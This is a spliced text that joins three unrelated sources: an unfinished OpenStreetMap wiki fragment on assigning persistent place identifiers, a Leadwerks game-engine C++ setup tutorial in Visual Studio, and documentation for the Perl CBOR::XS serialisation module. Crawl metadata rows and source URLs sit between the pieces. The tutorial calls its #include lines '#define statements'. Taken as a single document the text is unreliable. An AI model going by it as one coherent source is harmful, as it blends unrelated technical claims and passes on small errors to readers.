Decoding such an URI will not (currently) give you an URI object, but instead a CBOR::XS::Tagged object with tag number 32 and the string - exactly what was returned by
TO_CBOR.
To serialise an object so it can automatically be deserialised, you need to use
FREEZE and
THAW. To take the URI module as example, this would be a possible implementation:
sub URI::FREEZE {
   my ($self, $serialiser) = @_;
   "$self" # encode url string
}

sub URI::THAW {
   my ($class, $serialiser, $uri) = @_;
   $class->new ($uri)
}
Unlike
TO_CBOR, multiple values can be returned by
FREEZE. For example, a
FREEZE method that returns "type", "id" and "variant" values would cause an invocation of
THAW with 5 arguments:
sub My::Object::FREEZE {
   my ($self, $serialiser) = @_;

   ($self->{type}, $self->{id}, $self->{variant})
}

sub My::Object::THAW {
   my ($class, $serialiser, $type, $id, $variant) = @_;

   $class->new (type => $type, id => $id, variant => $variant)
}
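With such a pair in place, serialisation becomes transparent (My::Object->new is assumed here to be a conventional hash-based constructor):

my $obj = My::Object->new (type => "sensor", id => 17, variant => "b");

# encode_cbor calls My::Object::FREEZE and tags the result as a
# perl-object (tag 26); decode_cbor then looks up My::Object::THAW
my $restored = decode_cbor encode_cbor $obj;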
MAGIC HEADER
There is no way to distinguish CBOR from other formats programmatically. To make it easier to distinguish CBOR from other formats, the CBOR specification has a special "magic string" that can be prepended to any CBOR string without changing its meaning.
This string is available as
$CBOR::XS::MAGIC. This module does not prepend this string to the CBOR data it generates, but it will ignore it if present, so users can prepend this string as a "file type" indicator as required.
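For example, to write CBOR data with a type indicator and read it back ($data stands in for any encodable Perl structure):

use CBOR::XS;

# prepend the magic string as a "file type" marker
my $file_contents = $CBOR::XS::MAGIC . encode_cbor $data;

# the decoder ignores a leading magic string, so no stripping is needed
my $copy = decode_cbor $file_contents;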
THE CBOR::XS::Tagged CLASS
CBOR has the concept of tagged values - any CBOR value can be tagged with a numeric 64 bit number, and these tag numbers are centrally administered.
CBOR::XS handles a few tags internally when en- or decoding. You can also create tags yourself by encoding
CBOR::XS::Tagged objects, and the decoder will create
CBOR::XS::Tagged objects itself when it hits an unknown tag.
These objects are simply blessed array references - the first member of the array being the numerical tag, the second being the value.
You can interact with
CBOR::XS::Tagged objects in the following ways:
- $tagged = CBOR::XS::tag $tag, $value
This function(!) creates a new CBOR::XS::Tagged object using the given $tag (0..2**64-1) to tag the given $value (which can be any Perl value that can be encoded in CBOR, including serialisable Perl objects and CBOR::XS::Tagged objects).
- $tagged->[0]
-
- $tagged->[0] = $new_tag
-
- $tag = $tagged->tag
-
- $new_tag = $tagged->tag ($new_tag)
Access/mutate the tag.
- $tagged->[1]
-
- $tagged->[1] = $new_value
-
- $value = $tagged->value
-
- $new_value = $tagged->value ($new_value)
Access/mutate the tagged value.
EXAMPLES
Here are some examples of
CBOR::XS::Tagged uses to tag objects.
You can look up CBOR tag values and meanings in the IANA registry.
Prepend a magic header (
$CBOR::XS::MAGIC):
my $cbor = encode_cbor CBOR::XS::tag 55799, $value;

# same as:
my $cbor = $CBOR::XS::MAGIC . encode_cbor $value;
Serialise some URIs and a regex in an array:
my $cbor = encode_cbor [
   (CBOR::XS::tag 32, ""),
   (CBOR::XS::tag 32, ""),
   (CBOR::XS::tag 35, "^[Pp][Ee][Rr][lL]\$"),
];
Wrap CBOR data in CBOR:
my $cbor_cbor = encode_cbor CBOR::XS::tag 24, encode_cbor [1, 2, 3];
TAG HANDLING AND EXTENSIONS
This section describes how this module handles specific tagged values and extensions. If a tag is not mentioned here and no additional filters are provided for it, then the default handling applies (creating a CBOR::XS::Tagged object on decoding, and only encoding the tag when explicitly requested).
Tags not handled specifically are currently converted into a CBOR::XS::Tagged object, which is simply a blessed array reference consisting of the numeric tag value followed by the (decoded) CBOR value.
Future versions of this module reserve the right to special case additional tags (such as base64url).
ENFORCED TAGS
These tags are always handled when decoding, and their handling cannot be overridden by the user.
- 26 (perl-object,)
These tags are automatically created (and decoded) for serialisable objects using the FREEZE/THAW methods (the Types::Serialiser object serialisation protocol). See "OBJECT SERIALISATION" for details.
- 28, 29 (shareable, sharedref,)

These tags are automatically decoded when encountered (and they do not result in a cyclic data structure, see allow_cycles), resulting in shared values in the decoded object. They are only encoded, however, when allow_sharing is enabled.
Not all shared values can be successfully decoded: values that reference themselves will currently decode as undef (this is not the same as a reference pointing to itself, which will be represented as a value that contains an indirect reference to itself - these will be decoded properly).
Note that considerably more shared value data structures can be decoded than will be encoded - currently, only values pointed to by references will be shared, others will not. While non-reference shared values can be generated in Perl with some effort, they were considered too unimportant to be supported in the encoder. The decoder, however, will decode these values as shared values.
- 256, 25 (stringref-namespace, stringref,)
These tags are automatically decoded when encountered. They are only encoded, however, when pack_strings is enabled.
- 22098 (indirection,)
This tag is automatically generated when a reference is encountered (with the exception of hash and array references). It is converted to a reference when decoding.
- 55799 (self-describe CBOR, RFC 7049)
This value is not generated on encoding (unless explicitly requested by the user), and is simply ignored when decoding.
NON-ENFORCED TAGS
These tags have default filters provided when decoding. Their handling can be overridden by changing the
%CBOR::XS::FILTER entry for the tag, or by providing a custom
filter callback when decoding.
When they result in decoding into a specific Perl class, the module usually provides a corresponding
TO_CBOR method as well.
When any of these need to load additional modules that are not part of the perl core distribution (e.g. URI), it is (currently) up to the user to provide these modules. The decoding usually fails with an exception if the required module cannot be loaded.
- 0, 1 (date/time string, seconds since the epoch)
These tags are decoded into Time::Piece objects. The corresponding Time::Piece::TO_CBOR method always encodes into tag 1 values currently.
The Time::Piece API is generally surprisingly bad, and fractional seconds are only accidentally kept intact, so watch out. On the plus side, the module comes with perl since 5.10, which has to count for something.
- 2, 3 (positive/negative bignum)
These tags are decoded into Math::BigInt objects. The corresponding Math::BigInt::TO_CBOR method encodes "small" bigints into normal CBOR integers, and others into positive/negative CBOR bignums.
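A sketch of the round-trip (Math::BigInt must be loadable on the decode side, as noted above for non-enforced tags):

use CBOR::XS;
use Math::BigInt;

my $small = Math::BigInt->new (123);
my $huge  = Math::BigInt->new ("1" . "0" x 40);

# $small fits a normal CBOR integer; $huge becomes a tag 2 bignum
my $cbor = encode_cbor [$small, $huge];

# the default filter decodes tags 2/3 back into Math::BigInt objects
my ($a, $b) = @{ decode_cbor $cbor };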
- 4, 5, 264, 265 (decimal fraction/bigfloat)
Both decimal fractions and bigfloats are decoded into Math::BigFloat objects. The corresponding Math::BigFloat::TO_CBOR method always encodes into a decimal fraction (either tag 4 or 264).
NaN and infinities are not encoded properly, as they cannot be represented in CBOR.
See "BIGNUM SECURITY CONSIDERATIONS" for more info.
- 30 (rational numbers)
These tags are decoded into Math::BigRat objects. The corresponding Math::BigRat::TO_CBOR method encodes rational numbers with denominator 1 via their numerator only, i.e., they become normal integers or bignums.
See "BIGNUM SECURITY CONSIDERATIONS" for more info.
- 21, 22, 23 (expected later JSON conversion)
CBOR::XS is not a CBOR-to-JSON converter, and will simply ignore these tags.
- 32 (URI)
These objects decode into URI objects. The corresponding URI::TO_CBOR method again results in a CBOR URI value.
CBOR and JSON
CBOR is supposed to implement a superset of the JSON data model, and is, with some coercion, able to represent all JSON texts (something that other "binary JSON" formats such as BSON generally do not support).
CBOR implements some extra hints and support for JSON interoperability, and the spec offers further guidance for conversion between CBOR and JSON. None of this is currently implemented in CBOR::XS, and the guidelines in the spec do not result in correct round-tripping of data. If JSON interoperability is improved in the future, then the goal will be to ensure that decoded JSON data will round-trip encoding and decoding to CBOR intact.
SECURITY CONSIDERATIONS
When you are using CBOR in a protocol, talking to untrusted potentially hostile creatures requires relatively few measures.
First of all, your CBOR decoder should be secure, that is, should not have any buffer overflows. Obviously, this module should ensure that and I am trying hard on making that true, but you never know.
Second, you need to avoid resource-starving attacks. That means you should limit the size of CBOR data you accept, or make sure that when your resources run out, that's just fine (e.g. by using a separate process that can crash safely). The size of a CBOR string in octets is usually a good indication of the size of the resources required to decode it into a Perl structure. While CBOR::XS can check the size of the CBOR text, it might be too late when you already have it in memory, so you might want to check the size before you accept the string.
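A simple guard along these lines (the limit is an arbitrary example value - tune it to your application):

use CBOR::XS;

my $MAX_CBOR_OCTETS = 1_000_000;

sub decode_untrusted {
   my ($octets) = @_;

   length $octets <= $MAX_CBOR_OCTETS
      or die "CBOR message too large\n";

   CBOR::XS->new->decode ($octets)
}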
Third, CBOR::XS recurses using the C stack when decoding objects and arrays. The C stack is a limited resource: for instance, on my amd64 machine with 8MB of stack size I can decode around 180k nested arrays but only 14k nested CBOR maps.
Something else could bomb you, too, that I forgot to think of. In that case, you get to keep the pieces. I am always open for hints, though...
Also keep in mind that CBOR::XS might leak contents of your Perl data structures in its error messages, so when you serialise sensitive information you might want to make sure that exceptions thrown by CBOR::XS will not end up in front of untrusted eyes.
BIGNUM SECURITY CONSIDERATIONS
CBOR::XS provides a
TO_CBOR method for both Math::BigInt and Math::BigFloat that tries to encode the number in the simplest possible way, that is, either a CBOR integer, a CBOR bigint/decimal fraction (tag 4) or an arbitrary-exponent decimal fraction (tag 264). Rational numbers (Math::BigRat, tag 30) can also contain bignums as members.
CBOR::XS will also understand base-2 bigfloat or arbitrary-exponent bigfloats (tags 5 and 265), but it will never generate these on its own.
Using the built-in Math::BigInt::Calc support, encoding and decoding decimal fractions is generally fast. Decoding bigints can be slow for very big numbers (tens of thousands of digits, something that could potentially be caught by limiting the size of CBOR texts), and decoding bigfloats or arbitrary-exponent bigfloats can be extremely slow (minutes, decades) for large exponents (roughly 40 bit and longer).
Additionally, Math::BigInt can take advantage of other bignum libraries, such as Math::GMP, which cannot handle big floats with large exponents, and might simply abort or crash your program, due to their code quality.
This can be a concern if you want to parse untrusted CBOR. If it is, you might want to disable decoding of tag 2 (bigint) and 3 (negative bigint) types. You should also disable types 5 and 265, as these can be slow even without bigints.
Disabling bigints will also partially or fully disable types that rely on them, e.g. rational numbers that use bignums.
CBOR IMPLEMENTATION NOTES
This section contains some random implementation notes. They do not describe guaranteed behaviour, but merely behaviour as-is implemented right now.
64 bit integers are only properly decoded when Perl was built with 64 bit support.
Strings and arrays are encoded with a definite length. Hashes as well, unless they are tied (or otherwise magical).
Only the double data type is supported for NV data types - when Perl uses long double to represent floating point values, they might not be encoded properly. Half precision types are accepted, but not encoded.
Strict mode and canonical mode are not implemented.
LIMITATIONS ON PERLS WITHOUT 64-BIT INTEGER SUPPORT
On perls that were built without 64 bit integer support (these are rare nowadays, even on 32 bit architectures, as all major Perl distributions are built with 64 bit integer support), support for any kind of 64 bit integer in CBOR is very limited - most likely, these 64 bit values will be truncated, corrupted, or otherwise not decoded correctly. This also includes string, array and map sizes that are stored as 64 bit integers.
THREADS
This module is not guaranteed to be thread safe and there are no plans to change this until Perl gets thread support (as opposed to the horribly slow so-called "threads" which are simply slow and bloated process simulations - use fork, it's much faster, cheaper, better).
(It might actually work, but you have been warned).

SEE ALSO

The JSON and JSON::XS modules that do similar, but human-readable, serialisation.
The Types::Serialiser module provides the data model for true, false and error values.
AUTHOR
Marc Lehmann <[email protected]> | https://metacpan.org/pod/CBOR::XS | CC-MAIN-2016-40 | refinedweb | 5,736 | 51.38 |
NAME
ng_vlan - IEEE 802.1Q VLAN tagging netgraph node type
SYNOPSIS
#include <sys/types.h> #include <netgraph.h> #include <netgraph/ng_vlan.h>
DESCRIPTION
The vlan node type supports IEEE 802.1Q VLAN tagging: frames received on the downstream hook are demultiplexed to other hooks according to their VLAN tag, and frames that match no configured tag are delivered to the nomatch hook.
HOOKS
This node type supports the following hooks:

downstream
Typically this hook would be connected to a ng_ether(4) node, using the lower hook.

nomatch
Typically this hook would also be connected to an ng_ether(4) type node using the upper hook.

〈any valid name〉
Any other hook name will be accepted and should later be associated with a particular tag. Typically this hook would be attached to an ng_eiface(4) type node using the ether hook.
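As an illustration, the hooks above could be wired up roughly as follows with ngctl(8) (em0 is an example interface; the addfilter message name and its fields are the usual way such hook-to-tag associations are configured, but verify the exact syntax against your system's ng_vlan(4) and ngctl(8) manpages):

# attach a vlan node under the physical interface
ngctl mkpeer em0: vlan lower downstream
ngctl name em0:lower vlan0

# hand untagged/unmatched traffic back to the host stack
ngctl connect em0: vlan0: upper nomatch

# create a virtual interface on an arbitrarily named hook...
ngctl mkpeer vlan0: eiface vlan42 ether

# ...and associate that hook with VLAN tag 42
ngctl msg vlan0: addfilter '{ vlan=42 hook="vlan42" }'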
CONTROL MESSAGES
This node type supports the generic control messages, plus messages to associate a link hook with a particular VLAN tag, to remove such an association, and to retrieve the table of current tag-to-hook mappings.
This node shuts down upon receipt of a NGM_SHUTDOWN control message, or when all hooks have been disconnected.
SEE ALSO
netgraph(4), ng_eiface(4), ng_ether(4), ngctl(8), nghook(8)
HISTORY
The ng_vlan node type appeared in FreeBSD 4.10.
AUTHORS
Ruslan Ermilov 〈[email protected]〉 | http://manpages.ubuntu.com/manpages/intrepid/man4/ng_vlan.4freebsd.html | CC-MAIN-2015-27 | refinedweb | 153 | 68.47 |
#Introduction
The Agility CMS Model Updater allows you to seamlessly download and replace your strongly typed classes that represent your content and module definitions within Visual Studio.
Increase your Agility CMS development efficiency.
Instead of manually downloading your C# API classes from the Content Manager, simply select your C# API file within your VS project and right-click to update the classes automatically.
#Setup
The first time you open your project, you will need to right-click your C# API file and click Link Model.
Next, right-click the file again and click Update Model.
A window will now prompt you to login with your Agility user credentials.
Lastly, confirm the namespace that will be used to wrap your Agility C# API classes.
###Contributors
A special thank you goes out to Adriano Ueda () for sharing this extension with the community. | https://marketplace.visualstudio.com/items?itemName=AgilityInc.VS2017-2018-05-17 | CC-MAIN-2019-47 | refinedweb | 140 | 54.12 |
package org.w3c.dom.ls;

import org.w3c.dom.Node;
import org.w3c.dom.Element;

/**
 * <code>LSParserFilter</code>s provide applications the ability to examine
 * nodes as they are being constructed while parsing. As each node is
 * examined, it may be modified or removed, or the entire parse may be
 * terminated early.
 * <p> At the time any of the filter methods are called by the parser, the
 * owner Document and DOMImplementation objects exist and are accessible.
 * The document element is never passed to the <code>LSParserFilter</code>
 * methods, i.e. it is not possible to filter out the document element.
 * <code>Document</code>, <code>DocumentType</code>, <code>Notation</code>,
 * <code>Entity</code>, and <code>Attr</code> nodes are never passed to the
 * <code>acceptNode</code> method on the filter. The child nodes of an
 * <code>EntityReference</code> node are passed to the filter if the
 * parameter "<a HREF=''>entities</a>" is set to <code>false</code>. Note
 * that, as described by the parameter "<a HREF=''>entities</a>",
 * unexpanded entity reference nodes are never discarded and are always
 * passed to the filter.
 * <p> All validity checking while parsing a document occurs on the source
 * document as it appears on the input stream, not on the DOM document as it
 * is built in memory. With filters, the document in memory may be a subset
 * of the document on the stream, and its validity may have been affected by
 * the filtering.
 * <p> All default attributes must be present on elements when the elements
 * are passed to the filter methods. All other default content must be
 * passed to the filter methods.
 * <p> DOM applications must not raise exceptions in a filter. The effect of
 * throwing exceptions from a filter is DOM implementation dependent.
45 * <p>See also the <a HREF=''>Document Object Model (DOM) Level 3 Load46 and Save Specification</a>.47 */48 public interface LSParserFilter {49 // Constants returned by startElement and acceptNode50 /**51 * Accept the node.52 */53 public static final short FILTER_ACCEPT = 1;54 /**55 * Reject the node and its children.56 */57 public static final short FILTER_REJECT = 2;58 /**59 * Skip this single node. The children of this node will still be 60 * considered. 61 */62 public static final short FILTER_SKIP = 3;63 /**64 * Interrupt the normal processing of the document. 65 */66 public static final short FILTER_INTERRUPT = 4;67 68 /**69 * The parser will call this method after each <code>Element</code> start 70 * tag has been scanned, but before the remainder of the 71 * <code>Element</code> is processed. The intent is to allow the 72 * element, including any children, to be efficiently skipped. Note that 73 * only element nodes are passed to the <code>startElement</code> 74 * function. 75 * <br>The element node passed to <code>startElement</code> for filtering 76 * will include all of the Element's attributes, but none of the 77 * children nodes. The Element may not yet be in place in the document 78 * being constructed (it may not have a parent node.) 79 * <br>A <code>startElement</code> filter function may access or change 80 * the attributes for the Element. Changing Namespace declarations will 81 * have no effect on namespace resolution by the parser.82 * <br>For efficiency, the Element node passed to the filter may not be 83 * the same one as is actually placed in the tree if the node is 84 * accepted. And the actual node (node object identity) may be reused 85 * during the process of reading in and filtering a document.86 * @param elementArg The newly encountered element. At the time this 87 * method is called, the element is incomplete - it will have its 88 * attributes, but no children. 
89 * @return 90 * <ul>91 * <li> <code>FILTER_ACCEPT</code> if the <code>Element</code> should 92 * be included in the DOM document being built. 93 * </li>94 * <li> 95 * <code>FILTER_REJECT</code> if the <code>Element</code> and all of 96 * its children should be rejected. 97 * </li>98 * <li> <code>FILTER_SKIP</code> if the 99 * <code>Element</code> should be skipped. All of its children are 100 * inserted in place of the skipped <code>Element</code> node. 101 * </li>102 * <li> 103 * <code>FILTER_INTERRUPT</code> if the filter wants to stop the 104 * processing of the document. Interrupting the processing of the 105 * document does no longer guarantee that the resulting DOM tree is 106 * XML well-formed. The <code>Element</code> is rejected. 107 * </li>108 * </ul> Returning 109 * any other values will result in unspecified behavior. 110 */111 public short startElement(Element elementArg);112 113 /**114 * This method will be called by the parser at the completion of the 115 * parsing of each node. The node and all of its descendants will exist 116 * and be complete. The parent node will also exist, although it may be 117 * incomplete, i.e. it may have additional children that have not yet 118 * been parsed. Attribute nodes are never passed to this function.119 * <br>From within this method, the new node may be freely modified - 120 * children may be added or removed, text nodes modified, etc. The state 121 * of the rest of the document outside this node is not defined, and the 122 * affect of any attempt to navigate to, or to modify any other part of 123 * the document is undefined. 124 * <br>For validating parsers, the checks are made on the original 125 * document, before any modification by the filter. No validity checks 126 * are made on any document modifications made by the filter.127 * <br>If this new node is rejected, the parser might reuse the new node 128 * and any of its descendants.129 * @param nodeArg The newly constructed element. 
At the time this method 130 * is called, the element is complete - it has all of its children 131 * (and their children, recursively) and attributes, and is attached 132 * as a child to its parent. 133 * @return 134 * <ul>135 * <li> <code>FILTER_ACCEPT</code> if this <code>Node</code> should 136 * be included in the DOM document being built. 137 * </li>138 * <li> 139 * <code>FILTER_REJECT</code> if the <code>Node</code> and all of its 140 * children should be rejected. 141 * </li>142 * <li> <code>FILTER_SKIP</code> if the 143 * <code>Node</code> should be skipped and the <code>Node</code> 144 * should be replaced by all the children of the <code>Node</code>. 145 * </li>146 * <li> 147 * <code>FILTER_INTERRUPT</code> if the filter wants to stop the 148 * processing of the document. Interrupting the processing of the 149 * document does no longer guarantee that the resulting DOM tree is 150 * XML well-formed. The <code>Node</code> is accepted and will be the 151 * last completely parsed node. 152 * </li>153 * </ul>154 */155 public short acceptNode(Node nodeArg);156 157 /**158 * Tells the <code>LSParser</code> what types of nodes to show to the 159 * method <code>LSParserFilter.acceptNode</code>. If a node is not shown 160 * to the filter using this attribute, it is automatically included in 161 * the DOM document being built. See <code>NodeFilter</code> for 162 * definition of the constants. The constants <code>SHOW_ATTRIBUTE</code>163 * , <code>SHOW_DOCUMENT</code>, <code>SHOW_DOCUMENT_TYPE</code>, 164 * <code>SHOW_NOTATION</code>, <code>SHOW_ENTITY</code>, and 165 * <code>SHOW_DOCUMENT_FRAGMENT</code> are meaningless here. Those nodes 166 * will never be passed to <code>LSParserFilter.acceptNode</code>. 167 * <br> The constants used here are defined in [<a HREF=''>DOM Level 2 Traversal and Range</a>]168 * . 169 */170 public int getWhatToShow();171 172 }173
NSX Advanced Load Balancer - Logging and Troubleshooting Cheat Sheet
Get into the OS Shell (all elements)
sudo su
Controller Log Locations
Note: Everything in `/var/lib/avi/logs` is managed by Elasticsearch. I wouldn't mess with it.
Events published to the GUI:
/var/lib/avi/logs/ALL-EVENTS/
The primary log directory for Avi Vantage Controllers is `/opt/avi/log`. As this feeds into Elasticsearch, they have file outputs for every severity level. An easy way to get data on a specific object would be to build a `grep` statement like this:
grep {{ regex }} /opt/avi/log/{{ target }}
- `alert_notifications_*`: Summarized problems log. Events are in a `json` format!
Troubleshooting Deployment Failures
- `avi-nsx.*`: Presumably for NSX-T integration; further investigation required.
- `cloudconnectorgo.*`: Avi's cloud connector is pretty important given their architecture. This is where you can troubleshoot any issues getting a cloud turned up, or any initial provisioning issues.
- `vCenter*`: vCenter write mode activity logs. Look here for SE deployment failures in a traditional vSphere cloud.
Service Engines
Troubleshooting
Checking the Routing Table
NSX ALB / Avi uses FRRouting (7.0 as of release 20.1) over network namespaces to achieve management/data plane separation and VRF-Lite. To access the data plane, you will need to change namespaces! Unlike NSX-T, this doesn't happen over docker namespaces. This means that the following commands work in both as root:
- Show all VRF+Namespaces: `ip netns show`
- Send a one-shot command to the namespace: `ip netns exec {{ namespace }} {{ command }}`. Example: `ip netns exec avi_ns1 ip route show`
- Start a shell in the desired namespace: `ip netns exec {{ namespace }} {{ shell }}`. Example: `ip netns exec avi_ns1 bash`
Once in the `bash` shell, all normal commands apply as if there were no namespace/VRF.
For more information on Linux Network Namespaces, here's a pretty good guide:
Logging
All SE logging is contained in `/var/lib/avi/log`. Here are the significant log directories there:
- IMPORTANT! `bgp`: This is where all the routing protocol namespace logging from FRRouting lands.
- `traffic`: This one's pretty tough to parse and it's better to use Avi's Elasticsearch instead.
Conclusion
Avi Vantage has a pretty solid logging schema, but is very much a growing product. These logs will eventually be exposed more fully to the GUI/API, but for now it's handy to `grep` away. I'll be updating this list as I find more.
This is an updated version of the series Securing Dynamic Data Preview 4 from July 2009; here I plan to streamline the class libraries for the RTM version of Dynamic Data 4 and Visual Studio 2010.
This version is mostly the same as in Part 1 except I've done a great deal of refactoring, so I will list everything again here. The main difference is that there are now no user controls to replace the Delete buttons. Also I have changed the permissions system to be restrictive by default at Table level, i.e. you must have a permission set on every table for the table to be seen, but at Column level you deny columns you don't want to be seen.
Permissions Enums
The TableActions (renamed from TableDeny) enum in Listing 1 has had a CombinedActions class (Listing 2) added that combines sets of TableActions into logical security groups (i.e. ReadOnly equates to combining the TableActions Details and List, giving a more descriptive way of assigning rights to a security Role).
/// <summary>
/// Table permissions enum, allows different
/// levels of permission to be set for each
/// table on a per role basis.
/// </summary>
[Flags]
public enum TableActions
{
    /// <summary>
    /// Default no permissions
    /// </summary>
    None = 0x00,
    /// <summary>
    /// Details page
    /// </summary>
    Details = 0x01,
    /// <summary>
    /// List page
    /// </summary>
    List = 0x02,
    /// <summary>
    /// Edit page
    /// </summary>
    Edit = 0x04,
    /// <summary>
    /// Insert page
    /// </summary>
    Insert = 0x08,
    /// <summary>
    /// Delete operations
    /// </summary>
    Delete = 0x10,
}
Listing 1 – TableActions
/// <summary>
/// Combines Table permissions enums
/// into logical security groups
/// i.e. ReadOnly combines TableActions
/// Details and List
/// </summary>
public static class CombinedActions
{
    /// <summary>
    /// Read Only access
    /// TableActions.Details or
    /// TableActions.List
    /// </summary>
    public const TableActions ReadOnly =
        TableActions.Details | TableActions.List;

    /// <summary>
    /// Read and Write access
    /// TableActions.Details or
    /// TableActions.List or
    /// TableActions.Edit
    /// </summary>
    public const TableActions ReadWrite =
        TableActions.Details | TableActions.List | TableActions.Edit;

    /// <summary>
    /// Read Insert access
    /// TableActions.Details or
    /// TableActions.List or
    /// TableActions.Insert
    /// </summary>
    public const TableActions ReadInsert =
        TableActions.Details | TableActions.List | TableActions.Insert;

    /// <summary>
    /// Read Insert and Delete access
    /// TableActions.Details or
    /// TableActions.List or
    /// TableActions.Insert or
    /// TableActions.Delete
    /// </summary>
    public const TableActions ReadInsertDelete =
        TableActions.Details | TableActions.List |
        TableActions.Insert | TableActions.Delete;

    /// <summary>
    /// Read and Write access
    /// TableActions.Details or
    /// TableActions.List or
    /// TableActions.Edit or
    /// TableActions.Insert
    /// </summary>
    public const TableActions ReadWriteInsert =
        TableActions.Details | TableActions.List |
        TableActions.Edit | TableActions.Insert;

    /// <summary>
    /// Full access
    /// TableActions.Delete or
    /// TableActions.Details or
    /// TableActions.Edit or
    /// TableActions.Insert or
    /// TableActions.List
    /// </summary>
    public const TableActions Full =
        TableActions.Delete | TableActions.Details |
        TableActions.Edit | TableActions.Insert | TableActions.List;
}
Listing 2 – CombinedActions
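For readers who want to play with the flag arithmetic outside of C#, here is the same idea sketched with Python's `enum.Flag`. The names mirror the listings above, but this Python version is purely illustrative:

```python
from enum import Flag

class TableActions(Flag):
    NONE = 0
    DETAILS = 0x01
    LIST = 0x02
    EDIT = 0x04
    INSERT = 0x08
    DELETE = 0x10

# Combined groups, composed exactly as CombinedActions does
READ_ONLY = TableActions.DETAILS | TableActions.LIST
FULL = READ_ONLY | TableActions.EDIT | TableActions.INSERT | TableActions.DELETE

def is_allowed(granted, action):
    # Mirrors the C# test used later: (tp.Actions & action) == action
    return (granted & action) == action
```

A role granted READ_ONLY passes the check for LIST but fails it for DELETE, which is exactly how the route handler and SecureLinkButton below decide what a role may do.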
ColumnActions Listing 3 are used to deny either Write or Read access.
/// <summary>
/// Actions a Column can
/// have assigned to itself.
/// </summary>
[Flags]
public enum ColumnActions
{
    /// <summary>
    /// Action on a column/property
    /// </summary>
    DenyRead = 1,
    /// <summary>
    /// Action on a column/property
    /// </summary>
    DenyWrite = 2,
}
Listing 3 – ColumnActions
Secure Dynamic Data Route Handler
The SecureDynamicDataRouteHandler has changed very little since the original article; all I have added is the catch-all tp.Permission == CombinedActions.Full in the if statement to streamline the code.
/// <summary>
/// The SecureDynamicDataRouteHandler enables the
/// user to access a table based on the following:
/// the Roles and TableDeny values assigned to
/// the SecureTableAttribute.
/// </summary>
public class SecureDynamicDataRouteHandler : DynamicDataRouteHandler
{
    /// <summary>
    /// Creates the handler.
    /// </summary>
    /// <param name="route">The route.</param>
    /// <param name="table">The table.</param>
    /// <param name="action">The action.</param>
    /// <returns>An IHttpHandler</returns>
    public override IHttpHandler CreateHandler(
        DynamicDataRoute route, MetaTable table, string action)
    {
        var httpContext = HttpContext.Current;
        if (httpContext != null && httpContext.User != null)
        {
            var usersRoles = Roles.GetRolesForUser(httpContext.User.Identity.Name);
            var tablePermissions = table.Attributes.OfType<SecureTableAttribute>();

            // restrictive by default: if no permissions exist then no route is returned
            if (tablePermissions.Count() == 0)
                return null;

            foreach (var tp in tablePermissions)
            {
                if (tp.HasAnyRole(usersRoles))
                {
                    // if no action is allowed return no route
                    var tpAction = tp.Permission.ToString().Split(
                        new char[] { ',', ' ' },
                        StringSplitOptions.RemoveEmptyEntries);
                    if (tp.Permission == CombinedActions.Full || tpAction.Contains(action))
                        return base.CreateHandler(route, table, action);
                }
            }
        }
        return null;
    }
}
Listing 4 – Secure Dynamic Data Route Handler
This then covers all Edit, Insert and Details actions but not Delete.
Delete Actions
In the previous article we had a User Control that handled securing the Delete action; here we have a SecureLinkButton. All we do is override the Render method and test to see if the button is disabled via the user's security roles.
/// <summary>
/// Secures the link button when used for delete actions
/// </summary>
public class SecureLinkButton : LinkButton
{
    private const String DISABLED_NAMES = "SecureLinkButtonDeleteCommandNames";
    private String[] delete = new String[] { "delete" };

    /// <summary>
    /// Raises the Init event.
    /// </summary>
    /// <param name="e">
    /// An <see cref="T:System.EventArgs"/>
    /// object that contains the event data.
    /// </param>
    protected override void OnInit(EventArgs e)
    {
        if (ConfigurationManager.AppSettings.AllKeys.Contains(DISABLED_NAMES))
            delete = ConfigurationManager.AppSettings[DISABLED_NAMES]
                .ToLower()
                .Split(new char[] { ',' }, StringSplitOptions.RemoveEmptyEntries);
        base.OnInit(e);
    }

    /// <summary>
    /// Renders the control to the specified HTML writer.
    /// </summary>
    /// <param name="writer">
    /// The <see cref="T:System.Web.UI.HtmlTextWriter"/>
    /// object that receives the control content.
    /// </param>
    protected override void Render(HtmlTextWriter writer)
    {
        if (!IsDisabled())
            base.Render(writer);
        else
            writer.Write(String.Format("<a>{0}</a>", Text));
    }

    /// <summary>
    /// Determines whether this instance is disabled.
    /// </summary>
    /// <returns>
    /// <c>true</c> if this instance is
    /// disabled; otherwise, <c>false</c>.
    /// </returns>
    private Boolean IsDisabled()
    {
        if (!delete.Contains(CommandName.ToLower()))
            return false;

        // get restrictions for the current
        // users access to this table
        var table = DynamicDataRouteHandler.GetRequestMetaTable(Context);
        var usersRoles = Roles.GetRolesForUser();
        var tableRestrictions = table.Attributes.OfType<SecureTableAttribute>();

        // restrictive permissions
        if (tableRestrictions.Count() == 0)
            return true;

        foreach (var tp in tableRestrictions)
        {
            // the LinkButton is considered disabled if delete is denied.
            var action = CommandName.ToEnum<TableActions>();
            if (tp.HasAnyRole(usersRoles) && (tp.Actions & action) == action)
                return false;
        }
        return true;
    }
}
Listing 5 – Secure Link Button
In more detail, the IsDisabled method checks to see if the LinkButton's CommandName is one of the names in the "SecureLinkButtonDeleteCommandNames" application setting set in the web.config (note the default is "delete"). Then, if the user does not have Delete permission, the button is disabled.
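The setting lookup itself is just a comma-split with empty entries removed and a fall-back default. A rough Python equivalent of that parsing step (the key name and default come from the article; the function itself is only an illustration):

```python
def delete_command_names(app_settings):
    """Lower-cased command names treated as delete actions.

    Falls back to ["delete"], matching the control's default.
    """
    raw = app_settings.get("SecureLinkButtonDeleteCommandNames")
    if raw is None:
        return ["delete"]
    # Equivalent of Split(new[] { ',' }, StringSplitOptions.RemoveEmptyEntries)
    return [name for name in raw.lower().split(",") if name]
```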
So how do we use this SecureLinkButton? We add a tagMapping in the web.config file, see Listing 6.
<configuration>
  <system.web>
    <pages>
      <controls>
        <!-- custom tag assignments -->
        <add tagPrefix="asp"
             namespace="NotAClue.Web.DynamicData"
             assembly="NotAClue.Web.DynamicData" />
      </controls>
      <!-- custom tag mappings -->
      <tagMapping>
        <add tagType="System.Web.UI.WebControls.LinkButton"
             mappedTagType="NotAClue.Web.DynamicData.SecureLinkButton" />
      </tagMapping>
    </pages>
  </system.web>
</configuration>
Listing 6 – Tag Mapping in web.config
This means that our SecureLinkButton will replace the LinkButton throughout the site. However, if you do not like this you can just rename each delete <asp:LinkButton to <asp:SecureLinkButton; then you will get the same effect without adding the tagMapping section to the web.config.
The Secure Meta Model
Here the two main parts are the SecureMetaTable and the three MetaColumn types (SecureMetaColumn, SecureMetaForeignKeyColumn and SecureMetaChildrenColumn)
SecureMetaTable
